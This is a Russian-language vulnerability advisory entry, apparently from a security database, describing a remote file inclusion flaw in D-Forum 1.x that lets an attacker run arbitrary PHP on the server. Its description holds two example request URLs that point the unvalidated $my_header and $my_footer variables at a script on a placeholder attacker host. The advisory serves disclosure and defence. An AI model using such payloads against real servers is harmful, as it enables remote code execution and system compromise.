Выполнение произвольных команд в D-forum
| Дата публикации: | 20.02.2003 |
| Всего просмотров: | 937 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | D-Forum 1.x |
| Описание: | Уязвимость включения файла обнаружена в D-forum. Удаленный пользователь может выполнять произвольные команды на операционной системе. Файл 'header.php3' включает переменную $my_header и файл 'footer.php3' включает $my_footer переменную без надлежащей проверки включаемого файла. В результате удаленный атакующий может сконструировать URL, который определяет удаленное местоположение для для $my_header или $my_footer. PHP код, на который ссылаются эти переменные будет включен и выполнен целевым сервером. Пример: http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.t xt http://[target]/includes/header.php3?my_header=http://[attacker]/script.txtУязвимость обнаружена в D-forum 1.00 - 1.11; version 1.11 before November 23, 2002 |
| Ссылки: | VulnWatch] D-Forum (PHP) |